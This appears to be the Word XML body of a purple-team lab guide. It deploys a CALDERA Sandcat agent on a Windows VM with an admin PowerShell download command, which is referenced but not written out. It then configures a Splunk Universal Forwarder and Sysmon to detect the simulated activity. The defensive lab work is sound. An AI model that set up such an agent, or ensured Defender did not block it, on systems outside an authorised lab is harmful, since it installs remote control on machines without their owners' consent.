    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="18455614" w14:textId="02486FBC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Sysmon logs all activity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="49C708E6" w14:textId="606A0CC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Universal Forwarder sends logs to Splunk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="5D686207" w14:textId="5C63C7A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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 analyzes and generates alerts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="51205BB1" w14:textId="6356712D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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SOC analyst applies PICERL for incident response</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="18CACB6A" w14:textId="44900F8C">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166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="251D9694" w14:textId="666313BC">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6B6051F4" w14:textId="222F0510">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322"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Execute the Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="5BC7AB29" w14:textId="331CD69F">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1. Deploying and Connecting CALDERA Agent on Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="4EDD1628" w14:textId="2C600701">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Generate a Windows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Sandcat</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 Agent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="36698374" w14:textId="00A21A2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Navigate to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Agents → Deploy an Agent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inside CALDERA.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="02C51381" w14:textId="4AEA37DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Choose:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="2B02E791" w14:textId="092FB19D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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Platform:</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Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="611B2C53" w14:textId="151A9CB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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Architecture: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x64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="4DB89060" w14:textId="08F23498">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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Agent Type: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Sandcat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="5491F0FC" w14:textId="38CFB660">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Copy the generated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PowerShell download command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59F454C2" w14:textId="5B47A4C1">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Deploy the Agent on the Windows VM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="04FCD18E" w14:textId="5C9FA7D8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Open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PowerShell as Administrator</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5D61C753" w14:textId="7DC9BDD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Paste and run the downloaded CALDERA agent command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="38A14610" w14:textId="37645BE8">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Verify Agent Connectivity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="2B32A9CF" w14:textId="6B56E3FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Go to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Agents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page in CALDERA.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="7CFF4AE6" w14:textId="4FA6D3A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Confirm</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the Windows agent appears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Alive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3EBE9D3C" w14:textId="695C7273">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Ensure Communication Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="3D97302D" w14:textId="43AA0930">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Both Kali (CALDERA server) and Windows VM on the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same network</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2E4F1248" w14:textId="5B716357">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Port 8888</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must be accessible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="13A4A6DE" w14:textId="5E0BBF6C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Windows Defender should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not block</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the agent executable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="6A6F1F33" w14:textId="225C42CD">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="72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2DD3B106" wp14:anchorId="529FE2AB">
            <wp:extent cx="5943600" cy="3467100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16807284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0728401" name="Picture 1680728401"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId235920844">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3467100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="306CAB09" w14:textId="54F22AAC">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2C1408CE" w14:textId="022F6D7E">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2. Connecting Splunk Universal Forwarder to Splunk Enterprise</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="1902D967" w14:textId="419A4E81">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On Splunk Enterprise (Server)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="654B5D6D" w14:textId="60D2CBA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Open Splunk Web:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="166587AE" w:rsidR="282F2B94">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://&lt;192.168.23.133&gt;:8000</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="73E84432" w14:textId="387A3193">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Log in → Go to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Settings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4641ADA3" w14:textId="327531D7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Select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Forwarding and Receiving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rsidR="282F2B94">
        <w:drawing>
          <wp:inline wp14:editId="13448D3F" wp14:anchorId="50F3488C">
            <wp:extent cx="5715000" cy="4229100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15670664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7066413" name="Picture 1567066413"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1417273465">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="4229100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="08881067" w14:textId="18662FB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Click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Configure Receiving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19372EF6" w14:textId="5F40F552">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Choose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New</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 Receiving Port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326E2665" w14:textId="5A558BB1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Add port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9997</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then save.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="3DD2DE48" w14:textId="4CD7C6F8">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="72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41234EFA" wp14:anchorId="35689E55">
            <wp:extent cx="5943600" cy="1609725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16416378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1637844" name="Picture 1641637844"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1051438624">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1609725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="66955460" w14:textId="243DEF13">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On Windows (Universal Forwarder)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="5D2B0F38" w14:textId="18BAC2DD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Open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Services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 Ensure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SplunkForwarder</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service is running.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="5E48136B" w14:textId="1CC7CBEE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Open the Forwarder GUI:</w:t>
      </w:r>
      <w:r>
        <w:br/>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Start Menu → Splunk Universal Forwarder → Splunk Forwarder Management</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="68E0F409" w14:textId="4D602EFD">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="72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598296EB" wp14:anchorId="43DA52C9">
            <wp:extent cx="5943600" cy="4676775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17264453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6445301" name="Picture 1726445301"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId587508614">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4676775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="457F2CFC" w14:textId="2B4D10F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Go to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Forwarder Management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 Click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Add New Forwarding Host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7F1D9665" w14:textId="14AD60FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Enter:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="24ED68DD" w14:textId="59E23AB2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11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Host: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&lt;Splunk Enterprise IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="488E2937" w14:textId="21B9D74D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11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Port: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9997</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="00F929AE" w14:textId="04D157A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Save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settings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68D2F1B4" w14:textId="4FF37187">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Add Log Sources </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="166ABD88" w14:textId="2BA551D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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In Splunk Forwarder GUI → Go to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Data Inputs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06928EC2" w14:textId="2904BEF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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Select log type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="2B0C722D" w14:textId="20EFA550">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Windows Event Logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="2801E248" w14:textId="4C2145DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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PowerShell Logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="7A8A1336" w14:textId="382B4EB5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Sysmon Logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="5808E995" w14:textId="3560D459">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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Select desired logs such as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="718AD63F" w14:textId="02AE7229">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="5164992A" w14:textId="63CEC6BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Sysmon Operational</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="559A8693" w14:textId="42DAA5F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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Click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Next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choose an index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main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or custom).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="31644646" w14:textId="23A04BB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Save.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="42764AC6" w14:textId="4FD9D42B">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="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5224EA54" wp14:anchorId="244CA321">
            <wp:extent cx="5943600" cy="1495425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6027706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2770662" name="Picture 602770662"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId2034903187">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1495425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="167E8811" w14:textId="27D6B6A9">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6F7E78F2" wp14:anchorId="456FCA51">
            <wp:extent cx="5943600" cy="2019300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11966263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6626364" name="Picture 1196626364"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1169531693">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2019300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="22A90867" w14:textId="4B07ACA2">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3. Install, Run, and Forward Sysmon Logs to Splunk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="3257568E" w14:textId="24F3260C">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1. Download Sysmon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="503F280D" w14:textId="31B2B425">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Go to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Microsoft</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Sysinternals</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 website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1F580338" w14:textId="2AACB78A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Download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Sysmon.zip</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and extract it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="2A284709" w14:textId="77E21F01">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2. Download Sysmon Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="1F62C030" w14:textId="521524FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Open GitHub →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search</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SwiftOnSecurity</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 Sysmon config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47F977B4" w14:textId="2957D3B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Download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sysmon.xml</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1DD195B0" w14:textId="041CCFAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Place the config file inside the Sysmon folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="0BB012AD" w14:textId="499ECA94">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3. Install Sysmon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="2D174C85" w14:textId="36340217">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Run PowerShell as Administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="674FFDC7" w14:textId="6CEF15F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Execute:</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sysmon.exe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accepteula</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sysmon.xml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="0EC774D0" w14:textId="679ADE88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Ensure installation completes successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="7AA0F8BC" w14:textId="55A81BB0">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4. Verify Sysmon Operation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="0FF5C062" w14:textId="60056DA6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Open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Event Viewer</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0255181B" w14:textId="5852CC0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11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Applications and Services Logs → Microsoft → Windows → Sysmon → Operational</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="13C9444C" w14:textId="41C599E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Confirm logs such as Event ID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1, 3, 7</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appear.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="1C55144A" w14:textId="7631F1BF">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5. Forward Sysmon Logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="6A62319A" w14:textId="515242B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Open Splunk Forwarder GUI.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="34E6BCB0" w14:textId="671469BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Go to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Data Inputs → Windows Event Logs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4316DB57" w14:textId="238AC1A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Add:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="03EF6585" w14:textId="0CA2F16E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11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Microsoft-Windows-Sysmon/Operational</w:t>
      </w:r>
    </w:p>
